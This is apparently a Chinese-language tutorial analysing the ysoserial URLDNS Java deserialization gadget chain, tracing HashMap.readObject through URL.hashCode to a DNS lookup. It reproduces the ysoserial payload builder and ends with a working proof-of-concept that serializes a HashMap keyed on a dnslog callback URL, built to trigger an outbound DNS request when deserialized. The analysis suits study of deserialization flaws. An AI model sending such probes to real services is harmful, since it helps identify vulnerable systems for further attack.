在分析URLDNS之前,必須瞭解JAVA序列化和反序列化的基本概念。其中幾個重要的概念:
public class Urldns implements Serializable { public static void main(String[] args) throws Exception { Urldns urldns = new Urldns(); ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("d:\\urldns.txt")); objectOutputStream.writeObject(urldns); } public void run(){ System.out.println("urldns run"); } private void readObject(ObjectInputStream s) throws IOException, ClassNotFoundException { System.out.println("urldns readObject"); s.defaultReadObject(); } }
對這個測試類Urldns做序列化後,反序列化的時候執行了重寫的readobject方法。
import java.io.*; public class Serializable_run implements Serializable{ public void run(ObjectInputStream s) throws IOException, ClassNotFoundException { s.readObject(); } public static void main(String[] args) throws Exception { Serializable_run serializable_run = new Serializable_run(); serializable_run.run(new ObjectInputStream(new FileInputStream("d:\\urldns.txt"))); } }
所以只要對readobject方法做重寫就可以實現在反序列化該類的時候得到執行。
利用鏈的思路大致如此,那麼分析URLDNS的利用鏈。
public Object getObject(final String url) throws Exception { //Avoid DNS resolution during payload creation //Since the field <code>java.net.URL.handler</code> is transient, it will not be part of the serialized payload. URLStreamHandler handler = new SilentURLStreamHandler(); HashMap ht = new HashMap(); // HashMap that will contain the URL URL u = new URL(null, url, handler); // URL to use as the Key ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup. Reflections.setFieldValue(u, "hashCode", -1); // During the put above, the URL's hashCode is calculated and cached. This resets that so the next time hashCode is called a DNS lookup will be triggered. return ht; }
該類實際返回HashMap類型,但是HashMap用來用來存儲數據的數組是transient,序列化時忽略數據。
因爲HashMap重寫了writeobject方法,在writeobject實現了對數據的序列化。
還存在重寫readobject方法,那麼分析readobject中的內容。方法中遍歷key值執行putVal方法。
private void readObject(java.io.ObjectInputStream s) throws IOException, ClassNotFoundException { // Read in the threshold (ignored), loadfactor, and any hidden stuff s.defaultReadObject(); reinitialize(); if (loadFactor <= 0 || Float.isNaN(loadFactor)) throw new InvalidObjectException("Illegal load factor: " + loadFactor); s.readInt(); // Read and ignore number of buckets int mappings = s.readInt(); // Read number of mappings (size) if (mappings < 0) throw new InvalidObjectException("Illegal mappings count: " + mappings); else if (mappings > 0) { // (if zero, use defaults) // Size the table using given load factor only if within // range of 0.25...4.0 float lf = Math.min(Math.max(0.25f, loadFactor), 4.0f); float fc = (float)mappings / lf + 1.0f; int cap = ((fc < DEFAULT_INITIAL_CAPACITY) ? DEFAULT_INITIAL_CAPACITY : (fc >= MAXIMUM_CAPACITY) ? MAXIMUM_CAPACITY : tableSizeFor((int)fc)); float ft = (float)cap * lf; threshold = ((cap < MAXIMUM_CAPACITY && ft < MAXIMUM_CAPACITY) ? (int)ft : Integer.MAX_VALUE); // Check Map.Entry[].class since it's the nearest public type to // what we're actually creating. SharedSecrets.getJavaOISAccess().checkArray(s, Map.Entry[].class, cap); @SuppressWarnings({"rawtypes","unchecked"}) Node<K,V>[] tab = (Node<K,V>[])new Node[cap]; table = tab; // Read the keys and values, and put the mappings in the HashMap for (int i = 0; i < mappings; i++) { @SuppressWarnings("unchecked") K key = (K) s.readObject(); @SuppressWarnings("unchecked") V value = (V) s.readObject(); putVal(hash(key), key, value, false, false); } } }
觸發:
putVal(hash(key), key, value, false, false);
觸發:
static final int hash(Object key) {
int h;
return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
}
這裏的key對象如果是URL對象,那麼就
觸發:URL類中的hashCode方法
public synchronized int hashCode() {
if (hashCode != -1)
return hashCode;
hashCode = handler.hashCode(this);
return hashCode;
}
觸發DNS請求:
public synchronized int hashCode() { if (hashCode != -1) return hashCode; hashCode = handler.hashCode(this); return hashCode; }
protected synchronized InetAddress getHostAddress(URL u) { if (u.hostAddress != null) return u.hostAddress; String host = u.getHost(); if (host == null || host.equals("")) { return null; } else { try { u.hostAddress = InetAddress.getByName(host); } catch (UnknownHostException ex) { return null; } catch (SecurityException se) { return null; } } return u.hostAddress; }
在hashCode=-1的時候,可以觸發DNS請求,而hashCode私有屬性默認值爲-1。
所以爲了實現readobject方法的DNS請求,接下來要做的是:
1、製造一個HashMap對象,且key值爲URL對象;
2、保持私有屬性hashcode爲-1;
所以構造DNS請求的HashMap對象內容應該是:
public class Urldns implements Serializable { public static void main(String[] args) throws Exception { HashMap map = new HashMap(); URL url = new URL("http://ixw9i.8n6xsg.dnslogimalloc.xyz"); Class<?> aClass = Class.forName("java.net.URL"); Field hashCode = aClass.getDeclaredField("hashCode"); hashCode.setAccessible(true); hashCode.set(url,1); map.put(url, "xzjhlk"); hashCode.set(url,-1); ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("d:\\urldns.txt")); objectOutputStream.writeObject(map); } }
至於爲什麼在序列化的時候要通過反射將url對象中的hashCode屬性稍微非-1,是因爲hashCode的put方法也實際調用的是putVal(hash(key), key, value, false, true);
這個過程將觸發一次DNS請求。